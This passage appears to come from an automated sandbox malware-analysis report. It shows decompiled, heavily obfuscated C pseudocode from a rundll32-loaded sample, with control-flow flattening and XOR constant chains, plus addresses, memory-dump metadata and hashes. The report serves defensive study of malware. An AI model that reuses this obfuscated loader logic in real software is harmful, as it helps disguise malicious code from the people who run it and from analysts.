                                                                                                                      				_v296 = _v296 ^ 0xe8ab125b;
                                                                                                                      				_v296 = _v296 ^ 0x12f0c7da;
                                                                                                                      				_v296 = _v296 ^ 0xfa7b923a;
                                                                                                                      				_v304 = 0x37d359;
                                                                                                                      				_t903 = 0xcb9b74d;
                                                                                                                      				_v80 = 0x48;
                                                                                                                      				_v304 = _v304 * 0x7e;
                                                                                                                      				_v304 = _v304 | 0xb84966f9;
                                                                                                                      				_v304 = _v304 * 0x68;
                                                                                                                      				_v304 = _v304 ^ 0x2a2d9f44;
                                                                                                                      				_v140 = 0x53fc4;
                                                                                                                      				_v140 = _v140 ^ 0xe3b2dcd9;
                                                                                                                      				_v140 = _v140 ^ 0xe3b5fe0e;
                                                                                                                      				while(1) {
                                                                                                                      					L1:
                                                                                                                      					while(1) {
                                                                                                                      						L2:
                                                                                                                      						_t814 = 0xb5dc217;
                                                                                                                      						_t880 = 0xd2f1df;
                                                                                                                      						do {
                                                                                                                      							while(1) {
                                                                                                                      								L3:
                                                                                                                      								_t915 = _t796 - 0xb1829b2;
                                                                                                                      								if(_t915 > 0) {
                                                                                                                      									break;
                                                                                                                      								}
                                                                                                                      								if(_t915 == 0) {
                                                                                                                      									_push(_v372);
                                                                                                                      									_push(_v308);
                                                                                                                      									_push(0x2b15e8);
                                                                                                                      									_t775 = E002BAB66(_v364, _v244, __eflags);
                                                                                                                      									_push(_v176);
                                                                                                                      									_push(_v112);
                                                                                                                      									_push(0x2b1538);
                                                                                                                      									__eflags = E002C0EDA(E002BAB66(_v332, _v168, __eflags), _v120, _v416, _t775,  &_v100, _v252, _v276) - _v160;
                                                                                                                      									_t796 =  ==  ? 0xd2f1df : 0x4c92ee0;
                                                                                                                      									E002BAE03(_v400, _v408, _v268, _t775);
                                                                                                                      									E002BAE03(_v132, _v392, _v236, _t776);
                                                                                                                      									_t900 = _v84;
                                                                                                                      									_t908 = _t908 + 0x3c;
                                                                                                                      									goto L12;
                                                                                                                      								} else {
                                                                                                                      									if(_t796 == _t880) {
                                                                                                                      										_v88 = 0x100;
                                                                                                                      										_t784 = E002B5FE2(_v128, 0x100, _v228,  &_v104, _v284, _v380, _v100);
                                                                                                                      										_t908 = _t908 + 0x14;
                                                                                                                      										__eflags = _t784 - _v340;
                                                                                                                      										_t762 = 0x595c7f7;
                                                                                                                      										_t796 =  ==  ? 0x595c7f7 : 0x2464b44;
                                                                                                                      										goto L2;
                                                                                                                      									} else {
                                                                                                                      										if(_t796 == 0x2464b44) {
                                                                                                                      											E002B7027(_v304, _v312, _v100, _v140);
                                                                                                                      										} else {
                                                                                                                      											if(_t796 == _t762) {
                                                                                                                      												__eflags = E002CD76F(_v192, _v136, _v104, _v324) - _v108;
                                                                                                                      												_t796 =  ==  ? _t903 : 0xd356110;
                                                                                                                      												while(1) {
                                                                                                                      													L1:
                                                                                                                      													goto L2;
                                                                                                                      												}
                                                                                                                      											} else {
                                                                                                                      												if(_t796 == 0x60e8fa3) {
                                                                                                                      													_t796 = 0xb1829b2;
                                                                                                                      													continue;
                                                                                                                      												} else {
                                                                                                                      													if(_t796 == 0x6aa287e) {
                                                                                                                      														E002CE884(_v388, _v200, _v260, _v92);
                                                                                                                      														_t796 = 0xbb8b89b;
                                                                                                                      														while(1) {
                                                                                                                      															L1:
                                                                                                                      															L2:
                                                                                                                      															_t814 = 0xb5dc217;
                                                                                                                      															_t880 = 0xd2f1df;
                                                                                                                      															goto L3;
                                                                                                                      														}
                                                                                                                      													} else {
                                                                                                                      														_t921 = _t796 - 0x873eae2;
                                                                                                                      														if(_t796 == 0x873eae2) {
                                                                                                                      															_push(_v412);
                                                                                                                      															_push(_v184);
                                                                                                                      															_push(0x2b1588);
                                                                                                                      															E002CF9E2(_v292, _v264, _v100,  *_t900, _v316, _v124, _v144,  *((intOrPtr*)(_t900 + 4)), _v404, _v216, E002BAB66(_v124, _v356, _t921),  &_v96);
                                                                                                                      															_t796 =  ==  ? 0xb5dc217 : 0xd356110;
                                                                                                                      															E002BAE03(_v116, _v348, _v396, _t790);
                                                                                                                      															_t908 = _t908 + 0x3c;
                                                                                                                      															L12:
                                                                                                                      															_t903 = 0xcb9b74d;
                                                                                                                      															L33:
                                                                                                                      															_t880 = 0xd2f1df;
                                                                                                                      															_t814 = 0xb5dc217;
                                                                                                                      															_t762 = 0x595c7f7;
                                                                                                                      														}
                                                                                                                      														goto L34;
                                                                                                                      													}
                                                                                                                      												}
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      								L37:
                                                                                                                      								return _t907;
                                                                                                                      							}
                                                                                                                      							__eflags = _t796 - _t814;
                                                                                                                      							if(_t796 == _t814) {
                                                                                                                      								_t761 = E002BF0A0(_v320, _v232, _v96, _v328,  &_v92, _v104, _v240);
                                                                                                                      								_t908 = _t908 + 0x14;
                                                                                                                      								__eflags = _t761;
                                                                                                                      								if(__eflags != 0) {
                                                                                                                      									_t796 = 0xbb8b89b;
                                                                                                                      									goto L33;
                                                                                                                      								} else {
                                                                                                                      									_t796 = 0xc32131f;
                                                                                                                      									goto L1;
                                                                                                                      								}
                                                                                                                      							} else {
                                                                                                                      								__eflags = _t796 - 0xbb8b89b;
                                                                                                                      								if(_t796 == 0xbb8b89b) {
                                                                                                                      									E002C4E64(_v148, _v336, _v96, _v344, _v248);
                                                                                                                      									_t908 = _t908 + 0xc;
                                                                                                                      									_t796 = 0xd356110;
                                                                                                                      									while(1) {
                                                                                                                      										L1:
                                                                                                                      										goto L2;
                                                                                                                      									}
                                                                                                                      								} else {
                                                                                                                      									__eflags = _t796 - 0xc32131f;
                                                                                                                      									if(_t796 == 0xc32131f) {
                                                                                                                      										_t764 = E002BCFCE(_v92);
                                                                                                                      										_t796 = 0x6aa287e;
                                                                                                                      										__eflags = _t764;
                                                                                                                      										_t907 =  !=  ? 1 : _t907;
                                                                                                                      										while(1) {
                                                                                                                      											L1:
                                                                                                                      											goto L2;
                                                                                                                      										}
                                                                                                                      									} else {
                                                                                                                      										__eflags = _t796 - _t903;
                                                                                                                      										if(__eflags == 0) {
                                                                                                                      											_push(_v224);
                                                                                                                      											_push(_v220);
                                                                                                                      											_push(0x2b1588);
                                                                                                                      											_t906 = E002BAB66(_v212, _v288, __eflags);
                                                                                                                      											_v88 = _v80;
                                                                                                                      											_t768 = E002B3E2A(_v352, _v180, _t765, _v80, _v360, _v188, _v196, _v204, _v104, _v280,  &_v88, _v80,  &_v76, _v368);
                                                                                                                      											_t908 = _t908 + 0x3c;
                                                                                                                      											__eflags = _t768 - _v272;
                                                                                                                      											if(_t768 != _v272) {
                                                                                                                      												_t796 = 0xd356110;
                                                                                                                      											} else {
                                                                                                                      												_t770 =  *0x2d5c9c; // 0x0
                                                                                                                      												E002CFD29( &_v68, _v164, _t770 + 0x10, _v172, 0x40);
                                                                                                                      												_t908 = _t908 + 0xc;
                                                                                                                      												_t796 = 0x873eae2;
                                                                                                                      											}
                                                                                                                      											E002BAE03(_v256, _v300, _v156, _t906);
                                                                                                                      											goto L12;
                                                                                                                      										} else {
                                                                                                                      											__eflags = _t796 - 0xd356110;
                                                                                                                      											if(__eflags != 0) {
                                                                                                                      												goto L34;
                                                                                                                      											} else {
                                                                                                                      												E002C4E64(_v376, _v152, _v104, _v384, _v296);
                                                                                                                      												_t908 = _t908 + 0xc;
                                                                                                                      												_t796 = 0x2464b44;
                                                                                                                      												while(1) {
                                                                                                                      													L1:
                                                                                                                      													goto L2;
                                                                                                                      												}
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      							goto L37;
                                                                                                                      							L34:
                                                                                                                      						} while (_t796 != 0x4c92ee0);
                                                                                                                      						goto L37;
                                                                                                                      					}
                                                                                                                      				}
                                                                                                                      			}
                                                                                                                      0x002b9d1f
                                                                                                                      0x002b9d27
                                                                                                                      0x002b9d2c
                                                                                                                      0x002b9d34
                                                                                                                      0x002b9d39
                                                                                                                      0x002b9d41
                                                                                                                      0x002b9d4c
                                                                                                                      0x002b9d54
                                                                                                                      0x002b9d5f
                                                                                                                      0x002b9d75
                                                                                                                      0x002b9d7c
                                                                                                                      0x002b9d87
                                                                                                                      0x002b9d92
                                                                                                                      0x002b9d9d
                                                                                                                      0x002b9da8
                                                                                                                      0x002b9db0
                                                                                                                      0x002b9dc0
                                                                                                                      0x002b9dc6
                                                                                                                      0x002b9dce
                                                                                                                      0x002b9dd6
                                                                                                                      0x002b9de1
                                                                                                                      0x002b9df3
                                                                                                                      0x002b9df8
                                                                                                                      0x002b9e01
                                                                                                                      0x002b9e0c
                                                                                                                      0x002b9e17
                                                                                                                      0x002b9e22
                                                                                                                      0x002b9e2d
                                                                                                                      0x002b9e38
                                                                                                                      0x002b9e40
                                                                                                                      0x002b9e45
                                                                                                                      0x002b9e4d
                                                                                                                      0x002b9e55
                                                                                                                      0x002b9e5d
                                                                                                                      0x002b9e65
                                                                                                                      0x002b9e6d
                                                                                                                      0x002b9e76
                                                                                                                      0x002b9e7b
                                                                                                                      0x002b9e81
                                                                                                                      0x002b9e89
                                                                                                                      0x002b9e9c
                                                                                                                      0x002b9e9d
                                                                                                                      0x002b9ea4
                                                                                                                      0x002b9eaf
                                                                                                                      0x002b9eba
                                                                                                                      0x002b9ec5
                                                                                                                      0x002b9ed0
                                                                                                                      0x002b9edb
                                                                                                                      0x002b9ee3
                                                                                                                      0x002b9eed
                                                                                                                      0x002b9ef7
                                                                                                                      0x002b9efb
                                                                                                                      0x002b9f03
                                                                                                                      0x002b9f19
                                                                                                                      0x002b9f1e
                                                                                                                      0x002b9f25
                                                                                                                      0x002b9f30
                                                                                                                      0x002b9f3b
                                                                                                                      0x002b9f46
                                                                                                                      0x002b9f4e
                                                                                                                      0x002b9f59
                                                                                                                      0x002b9f64
                                                                                                                      0x002b9f6c
                                                                                                                      0x002b9f77
                                                                                                                      0x002b9f82
                                                                                                                      0x002b9f8a
                                                                                                                      0x002b9f98
                                                                                                                      0x002b9f9d
                                                                                                                      0x002b9fa1
                                                                                                                      0x002b9fa9
                                                                                                                      0x002b9fb1
                                                                                                                      0x002b9fbc
                                                                                                                      0x002b9fc7
                                                                                                                      0x002b9fd2
                                                                                                                      0x002b9fe0
                                                                                                                      0x002b9fe5
                                                                                                                      0x002b9fe9
                                                                                                                      0x002b9ff4
                                                                                                                      0x002b9ff8
                                                                                                                      0x002ba000
                                                                                                                      0x002ba00b
                                                                                                                      0x002ba013
                                                                                                                      0x002ba01e
                                                                                                                      0x002ba029
                                                                                                                      0x002ba034
                                                                                                                      0x002ba03f
                                                                                                                      0x002ba04a
                                                                                                                      0x002ba055
                                                                                                                      0x002ba060
                                                                                                                      0x002ba06b
                                                                                                                      0x002ba076
                                                                                                                      0x002ba081
                                                                                                                      0x002ba08c
                                                                                                                      0x002ba094
                                                                                                                      0x002ba0a1
                                                                                                                      0x002ba0a5
                                                                                                                      0x002ba0ad
                                                                                                                      0x002ba0b5
                                                                                                                      0x002ba0c0
                                                                                                                      0x002ba0c8
                                                                                                                      0x002ba0d3
                                                                                                                      0x002ba0db
                                                                                                                      0x002ba0e0
                                                                                                                      0x002ba0e5
                                                                                                                      0x002ba0ed
                                                                                                                      0x002ba0f5
                                                                                                                      0x002ba100
                                                                                                                      0x002ba10b
                                                                                                                      0x002ba116
                                                                                                                      0x002ba121
                                                                                                                      0x002ba12c
                                                                                                                      0x002ba137
                                                                                                                      0x002ba142
                                                                                                                      0x002ba14d
                                                                                                                      0x002ba158
                                                                                                                      0x002ba160
                                                                                                                      0x002ba16d
                                                                                                                      0x002ba17a
                                                                                                                      0x002ba17d
                                                                                                                      0x002ba181
                                                                                                                      0x002ba189
                                                                                                                      0x002ba194
                                                                                                                      0x002ba19c
                                                                                                                      0x002ba1a7
                                                                                                                      0x002ba1b2
                                                                                                                      0x002ba1ba
                                                                                                                      0x002ba1c5
                                                                                                                      0x002ba1d0
                                                                                                                      0x002ba1e6
                                                                                                                      0x002ba1ed
                                                                                                                      0x002ba1f8
                                                                                                                      0x002ba203
                                                                                                                      0x002ba20e
                                                                                                                      0x002ba215
                                                                                                                      0x002ba220
                                                                                                                      0x002ba22b
                                                                                                                      0x002ba236
                                                                                                                      0x002ba241
                                                                                                                      0x002ba253
                                                                                                                      0x002ba258
                                                                                                                      0x002ba261
                                                                                                                      0x002ba26c
                                                                                                                      0x002ba274
                                                                                                                      0x002ba27d
                                                                                                                      0x002ba280
                                                                                                                      0x002ba289
                                                                                                                      0x002ba28d
                                                                                                                      0x002ba295
                                                                                                                      0x002ba2a8
                                                                                                                      0x002ba2af
                                                                                                                      0x002ba2ba
                                                                                                                      0x002ba2c7
                                                                                                                      0x002ba2cb
                                                                                                                      0x002ba2d8
                                                                                                                      0x002ba2dc
                                                                                                                      0x002ba2e4
                                                                                                                      0x002ba2ef
                                                                                                                      0x002ba2fa
                                                                                                                      0x002ba305
                                                                                                                      0x002ba310
                                                                                                                      0x002ba31d
                                                                                                                      0x002ba321
                                                                                                                      0x002ba329
                                                                                                                      0x002ba331
                                                                                                                      0x002ba339
                                                                                                                      0x002ba344
                                                                                                                      0x002ba34f
                                                                                                                      0x002ba35a
                                                                                                                      0x002ba362
                                                                                                                      0x002ba36f
                                                                                                                      0x002ba378
                                                                                                                      0x002ba37c
                                                                                                                      0x002ba384
                                                                                                                      0x002ba38f
                                                                                                                      0x002ba39a
                                                                                                                      0x002ba3a5
                                                                                                                      0x002ba3b0
                                                                                                                      0x002ba3b8
                                                                                                                      0x002ba3c3
                                                                                                                      0x002ba3cd
                                                                                                                      0x002ba3d5
                                                                                                                      0x002ba3e5
                                                                                                                      0x002ba3ed
                                                                                                                      0x002ba3f5
                                                                                                                      0x002ba3fd
                                                                                                                      0x002ba405
                                                                                                                      0x002ba40d
                                                                                                                      0x002ba41c
                                                                                                                      0x002ba41d
                                                                                                                      0x002ba426
                                                                                                                      0x002ba42a
                                                                                                                      0x002ba432
                                                                                                                      0x002ba43d
                                                                                                                      0x002ba448
                                                                                                                      0x002ba450
                                                                                                                      0x002ba45b
                                                                                                                      0x002ba463
                                                                                                                      0x002ba468
                                                                                                                      0x002ba470
                                                                                                                      0x002ba478
                                                                                                                      0x002ba480
                                                                                                                      0x002ba488
                                                                                                                      0x002ba490
                                                                                                                      0x002ba495
                                                                                                                      0x002ba49d
                                                                                                                      0x002ba4a5
                                                                                                                      0x002ba4b0
                                                                                                                      0x002ba4bb
                                                                                                                      0x002ba4c6
                                                                                                                      0x002ba4da
                                                                                                                      0x002ba4e1
                                                                                                                      0x002ba4ec
                                                                                                                      0x002ba4f7
                                                                                                                      0x002ba502
                                                                                                                      0x002ba50d
                                                                                                                      0x002ba518
                                                                                                                      0x002ba520

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: *2c$,$0L4$Api$G=$$H$R\$TKW$a=$n:p$pZy$zR-$4r
                                                                                                                      • API String ID: 0-1682715903
                                                                                                                      • Opcode ID: 5e9b78d41a2773c66c65c1a82b0859679c701fa080d3b1951832dc9f85408f70
                                                                                                                      • Instruction ID: 310d67ef8c72a16b737cf73e4875e58ca1884eefe201f94bcc683c1696df1bf5
                                                                                                                      • Opcode Fuzzy Hash: 5e9b78d41a2773c66c65c1a82b0859679c701fa080d3b1951832dc9f85408f70
                                                                                                                      • Instruction Fuzzy Hash: EB82FE71508381CBD379CF65C58AA8BBBE2BBC4348F10891DE2DA86260D7B58959CF53
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 91%
                                                                                                                      			E002C6864(char __ecx, signed int __edx) {
                                                                                                                      				char _v128;
                                                                                                                      				char _v256;
                                                                                                                      				char _v288;
                                                                                                                      				signed int _v292;
                                                                                                                      				intOrPtr _v296;
                                                                                                                      				intOrPtr _v300;
                                                                                                                      				intOrPtr _v304;
                                                                                                                      				intOrPtr _v308;
                                                                                                                      				signed int _v312;
                                                                                                                      				signed int _v316;
                                                                                                                      				signed int _v320;
                                                                                                                      				signed int _v324;
                                                                                                                      				signed int _v328;
                                                                                                                      				signed int _v332;
                                                                                                                      				signed int _v336;
                                                                                                                      				signed int _v340;
                                                                                                                      				signed int _v344;
                                                                                                                      				signed int _v348;
                                                                                                                      				signed int _v352;
                                                                                                                      				signed int _v356;
                                                                                                                      				signed int _v360;
                                                                                                                      				signed int _v364;
                                                                                                                      				signed int _v368;
                                                                                                                      				signed int _v372;
                                                                                                                      				signed int _v376;
                                                                                                                      				unsigned int _v380;
                                                                                                                      				unsigned int _v384;
                                                                                                                      				signed int _v388;
                                                                                                                      				signed int _v392;
                                                                                                                      				signed int _v396;
                                                                                                                      				signed int _v400;
                                                                                                                      				signed int _v404;
                                                                                                                      				signed int _v408;
                                                                                                                      				signed int _v412;
                                                                                                                      				signed int _v416;
                                                                                                                      				signed int _v420;
                                                                                                                      				signed int _v424;
                                                                                                                      				signed int _v428;
                                                                                                                      				signed int _v432;
                                                                                                                      				signed int _v436;
                                                                                                                      				signed int _v440;
                                                                                                                      				signed int _v444;
                                                                                                                      				signed int _v448;
                                                                                                                      				signed int _v452;
                                                                                                                      				signed int _v456;
                                                                                                                      				signed int _v460;
                                                                                                                      				signed int _v464;
                                                                                                                      				unsigned int _v468;
                                                                                                                      				signed int _v472;
                                                                                                                      				signed int _v476;
                                                                                                                      				signed int _v480;
                                                                                                                      				signed int _v484;
                                                                                                                      				char _v488;
                                                                                                                      				signed int _v492;
                                                                                                                      				signed int _v496;
                                                                                                                      				signed int _v500;
                                                                                                                      				signed int _v504;
                                                                                                                      				signed int _v508;
                                                                                                                      				signed int _v512;
                                                                                                                      				unsigned int _v516;
                                                                                                                      				signed int _v520;
                                                                                                                      				signed int _v524;
                                                                                                                      				signed int _v528;
                                                                                                                      				signed int _v532;
                                                                                                                      				signed int _v536;
                                                                                                                      				signed int _t574;
                                                                                                                      				signed int _t578;
                                                                                                                      				signed int _t583;
                                                                                                                      				void* _t604;
                                                                                                                      				void* _t614;
                                                                                                                      				signed int _t616;
                                                                                                                      				int _t621;
                                                                                                                      				signed int _t623;
                                                                                                                      				signed int _t624;
                                                                                                                      				signed int _t628;
                                                                                                                      				intOrPtr* _t633;
                                                                                                                      				void* _t636;
                                                                                                                      				void* _t637;
                                                                                                                      				void* _t638;
                                                                                                                      				signed int _t654;
                                                                                                                      				void* _t686;
                                                                                                                      				void* _t687;
                                                                                                                      				signed int _t689;
                                                                                                                      				signed int _t703;
                                                                                                                      				signed int _t704;
                                                                                                                      				signed int _t705;
                                                                                                                      				signed int _t706;
                                                                                                                      				signed int _t707;
                                                                                                                      				signed int _t708;
                                                                                                                      				signed int _t709;
                                                                                                                      				signed int _t710;
                                                                                                                      				signed int _t711;
                                                                                                                      				signed int _t712;
                                                                                                                      				signed int _t713;
                                                                                                                      				signed int _t714;
                                                                                                                      				signed int _t715;
                                                                                                                      				void* _t719;
                                                                                                                      				void* _t722;
                                                                                                                      				void* _t723;
                                                                                                                      				void* _t724;
                                                                                                                      				signed int _t729;
                                                                                                                      				signed int* _t730;
                                                                                                                      				void* _t736;
                                                                                                                      
                                                                                                                      				_t730 =  &_v536;
                                                                                                                      				_v312 = __edx;
                                                                                                                      				_v488 = __ecx;
                                                                                                                      				_v292 = _v292 & 0x00000000;
                                                                                                                      				_v304 = 0xafedb;
                                                                                                                      				_v300 = 0x161b15;
                                                                                                                      				_v296 = 0xc4991c;
                                                                                                                      				_v520 = 0x229c01;
                                                                                                                      				_v520 = _v520 * 0x5c;
                                                                                                                      				_t723 = 0xff9e75d;
                                                                                                                      				_v520 = _v520 + 0xffff9f66;
                                                                                                                      				_t703 = 0xc;
                                                                                                                      				_v520 = _v520 / _t703;
                                                                                                                      				_v520 = _v520 ^ 0x01094ea5;
                                                                                                                      				_v532 = 0xceed0e;
                                                                                                                      				_v532 = _v532 << 3;
                                                                                                                      				_v532 = _v532 | 0xe74d27fb;
                                                                                                                      				_v532 = _v532 ^ 0xe772d72f;
                                                                                                                      				_v476 = 0xc446fa;
                                                                                                                      				_v476 = _v476 + 0xf6e0;
                                                                                                                      				_v476 = _v476 + 0x4782;
                                                                                                                      				_v476 = _v476 + 0xffffecbc;
                                                                                                                      				_v476 = _v476 ^ 0x00cc0886;
                                                                                                                      				_v336 = 0x190970;
                                                                                                                      				_t704 = 0x2e;
                                                                                                                      				_v336 = _v336 * 0x68;
                                                                                                                      				_v336 = _v336 ^ 0x0a2923c5;
                                                                                                                      				_v328 = 0x78e0eb;
                                                                                                                      				_v328 = _v328 + 0x488f;
                                                                                                                      				_v328 = _v328 ^ 0x00799c70;
                                                                                                                      				_v344 = 0x81e0f6;
                                                                                                                      				_v344 = _v344 << 5;
                                                                                                                      				_v344 = _v344 ^ 0x103feee2;
                                                                                                                      				_v468 = 0xdaa1d;
                                                                                                                      				_v468 = _v468 * 0x7d;
                                                                                                                      				_v468 = _v468 + 0xfffff9ad;
                                                                                                                      				_v468 = _v468 >> 0xb;
                                                                                                                      				_v468 = _v468 ^ 0x0000a0f1;
                                                                                                                      				_v500 = 0x314529;
                                                                                                                      				_t62 =  &_v500; // 0x314529
                                                                                                                      				_v500 =  *_t62 * 0x2f;
                                                                                                                      				_t64 =  &_v500; // 0x314529
                                                                                                                      				_v500 =  *_t64 * 0x58;
                                                                                                                      				_v500 = _v500 ^ 0x606cc451;
                                                                                                                      				_v500 = _v500 ^ 0x7c6b32c1;
                                                                                                                      				_v452 = 0xb84a45;
                                                                                                                      				_v452 = _v452 + 0x7128;
                                                                                                                      				_t705 = 0x77;
                                                                                                                      				_v452 = _v452 / _t704;
                                                                                                                      				_v452 = _v452 ^ 0x000855d5;
                                                                                                                      				_v320 = 0x670f1a;
                                                                                                                      				_v320 = _v320 + 0xc1b0;
                                                                                                                      				_v320 = _v320 ^ 0x00622c3e;
                                                                                                                      				_v528 = 0x36f841;
                                                                                                                      				_v528 = _v528 | 0xd9d6132d;
                                                                                                                      				_v528 = _v528 + 0xffff776d;
                                                                                                                      				_v528 = _v528 << 0xd;
                                                                                                                      				_v528 = _v528 ^ 0xce5fe5c5;
                                                                                                                      				_v444 = 0x9c7682;
                                                                                                                      				_v444 = _v444 ^ 0x90589f65;
                                                                                                                      				_v444 = _v444 * 0x27;
                                                                                                                      				_v444 = _v444 ^ 0x0df55b42;
                                                                                                                      				_v512 = 0x104d73;
                                                                                                                      				_v512 = _v512 / _t705;
                                                                                                                      				_v512 = _v512 ^ 0x3e9257a1;
                                                                                                                      				_v512 = _v512 | 0xb9bbbc7d;
                                                                                                                      				_v512 = _v512 ^ 0xbfb4ec53;
                                                                                                                      				_v428 = 0xbc5642;
                                                                                                                      				_v428 = _v428 ^ 0xe7847a8c;
                                                                                                                      				_t706 = 0x55;
                                                                                                                      				_v428 = _v428 * 0x7f;
                                                                                                                      				_v428 = _v428 ^ 0xb4dd412b;
                                                                                                                      				_v436 = 0x8f794f;
                                                                                                                      				_v436 = _v436 << 9;
                                                                                                                      				_v436 = _v436 / _t706;
                                                                                                                      				_v436 = _v436 ^ 0x00567a69;
                                                                                                                      				_v496 = 0x46853b;
                                                                                                                      				_v496 = _v496 + 0xffff90ed;
                                                                                                                      				_v496 = _v496 >> 5;
                                                                                                                      				_t707 = 0x67;
                                                                                                                      				_v496 = _v496 / _t707;
                                                                                                                      				_v496 = _v496 ^ 0x000cc5d9;
                                                                                                                      				_v372 = 0xd1254b;
                                                                                                                      				_v372 = _v372 << 7;
                                                                                                                      				_v372 = _v372 ^ 0x689f86f2;
                                                                                                                      				_v504 = 0x5d1a6;
                                                                                                                      				_v504 = _v504 + 0xffffc3f1;
                                                                                                                      				_v504 = _v504 ^ 0x7853fb4b;
                                                                                                                      				_v504 = _v504 | 0x0811a454;
                                                                                                                      				_v504 = _v504 ^ 0x78557827;
                                                                                                                      				_v376 = 0x40c0d3;
                                                                                                                      				_v376 = _v376 + 0xba7b;
                                                                                                                      				_v376 = _v376 ^ 0x0043f819;
                                                                                                                      				_v448 = 0x188995;
                                                                                                                      				_v448 = _v448 ^ 0x19c6d723;
                                                                                                                      				_v448 = _v448 + 0xffff6508;
                                                                                                                      				_v448 = _v448 ^ 0x19d0df3a;
                                                                                                                      				_v368 = 0xa08e58;
                                                                                                                      				_v368 = _v368 | 0xc4b17aa1;
                                                                                                                      				_v368 = _v368 ^ 0xc4b81ac3;
                                                                                                                      				_v492 = 0x5a5e24;
                                                                                                                      				_v492 = _v492 ^ 0x14ae01a0;
                                                                                                                      				_v492 = _v492 + 0xffffeac5;
                                                                                                                      				_v492 = _v492 + 0xffff378f;
                                                                                                                      				_v492 = _v492 ^ 0x14f310c0;
                                                                                                                      				_v460 = 0x25665c;
                                                                                                                      				_v460 = _v460 << 9;
                                                                                                                      				_v460 = _v460 + 0xb06;
                                                                                                                      				_v460 = _v460 + 0x6999;
                                                                                                                      				_v460 = _v460 ^ 0x4ac4129f;
                                                                                                                      				_v316 = 0x9c2147;
                                                                                                                      				_v316 = _v316 | 0xf1f8cc6e;
                                                                                                                      				_v316 = _v316 ^ 0xf1f4b434;
                                                                                                                      				_v524 = 0x2e48d0;
                                                                                                                      				_v524 = _v524 + 0xffff862d;
                                                                                                                      				_v524 = _v524 + 0x29e8;
                                                                                                                      				_v524 = _v524 * 0x4b;
                                                                                                                      				_v524 = _v524 ^ 0x0d7cea3a;
                                                                                                                      				_v384 = 0x8701af;
                                                                                                                      				_v384 = _v384 + 0xf5cc;
                                                                                                                      				_v384 = _v384 >> 7;
                                                                                                                      				_v384 = _v384 ^ 0x000bfa6c;
                                                                                                                      				_v484 = 0x89e0a0;
                                                                                                                      				_v484 = _v484 >> 6;
                                                                                                                      				_v484 = _v484 << 0xd;
                                                                                                                      				_v484 = _v484 | 0xc3b3473c;
                                                                                                                      				_v484 = _v484 ^ 0xc7fe9c77;
                                                                                                                      				_v516 = 0xee0a8f;
                                                                                                                      				_v516 = _v516 ^ 0x55897709;
                                                                                                                      				_v516 = _v516 | 0x2d6779b6;
                                                                                                                      				_v516 = _v516 >> 0xc;
                                                                                                                      				_v516 = _v516 ^ 0x0009a0b5;
                                                                                                                      				_v408 = 0x69ddc;
                                                                                                                      				_v408 = _v408 + 0xffff558a;
                                                                                                                      				_v408 = _v408 | 0x7b9a8e55;
                                                                                                                      				_v408 = _v408 ^ 0x7b9d6bde;
                                                                                                                      				_v440 = 0x3ec00a;
                                                                                                                      				_t708 = 7;
                                                                                                                      				_v440 = _v440 * 0x6d;
                                                                                                                      				_v440 = _v440 ^ 0x82501226;
                                                                                                                      				_v440 = _v440 ^ 0x98e12210;
                                                                                                                      				_v360 = 0xa9836;
                                                                                                                      				_t709 = 0x66;
                                                                                                                      				_v360 = _v360 / _t708;
                                                                                                                      				_v360 = _v360 ^ 0x000ed550;
                                                                                                                      				_v508 = 0xae1f70;
                                                                                                                      				_v508 = _v508 / _t709;
                                                                                                                      				_v508 = _v508 | 0xf9ffdfbb;
                                                                                                                      				_v508 = _v508 ^ 0xf9f8fc25;
                                                                                                                      				_v324 = 0xeedbe0;
                                                                                                                      				_v324 = _v324 + 0xffffa9bd;
                                                                                                                      				_v324 = _v324 ^ 0x00e20b5f;
                                                                                                                      				_v392 = 0x6a2c5c;
                                                                                                                      				_v392 = _v392 | 0xb7dff57a;
                                                                                                                      				_v392 = _v392 << 0xb;
                                                                                                                      				_v392 = _v392 ^ 0xffee34eb;
                                                                                                                      				_v432 = 0x407729;
                                                                                                                      				_v432 = _v432 + 0xb79f;
                                                                                                                      				_v432 = _v432 | 0x8bf66f7a;
                                                                                                                      				_v432 = _v432 ^ 0x8bfc9481;
                                                                                                                      				_v424 = 0x63ea97;
                                                                                                                      				_v424 = _v424 >> 0x10;
                                                                                                                      				_v424 = _v424 + 0xffffc4e0;
                                                                                                                      				_v424 = _v424 ^ 0xfffae0f6;
                                                                                                                      				_v332 = 0x7c55b7;
                                                                                                                      				_t710 = 0x1b;
                                                                                                                      				_v332 = _v332 / _t710;
                                                                                                                      				_v332 = _v332 ^ 0x0008067b;
                                                                                                                      				_v352 = 0x1d2ffa;
                                                                                                                      				_t711 = 0x70;
                                                                                                                      				_v352 = _v352 * 0x3b;
                                                                                                                      				_v352 = _v352 ^ 0x06b3fb37;
                                                                                                                      				_v416 = 0x356707;
                                                                                                                      				_t712 = 0x4d;
                                                                                                                      				_v416 = _v416 / _t711;
                                                                                                                      				_v416 = _v416 * 0xf;
                                                                                                                      				_v416 = _v416 ^ 0x000a8be6;
                                                                                                                      				_v400 = 0x975723;
                                                                                                                      				_v400 = _v400 | 0x269443d2;
                                                                                                                      				_v400 = _v400 << 9;
                                                                                                                      				_v400 = _v400 ^ 0x2eac99c7;
                                                                                                                      				_v396 = 0x86389d;
                                                                                                                      				_v396 = _v396 ^ 0xdd3767b8;
                                                                                                                      				_t713 = 0x6d;
                                                                                                                      				_v396 = _v396 / _t712;
                                                                                                                      				_v396 = _v396 ^ 0x02eba2ca;
                                                                                                                      				_v404 = 0xdbbdba;
                                                                                                                      				_v404 = _v404 << 9;
                                                                                                                      				_v404 = _v404 / _t713;
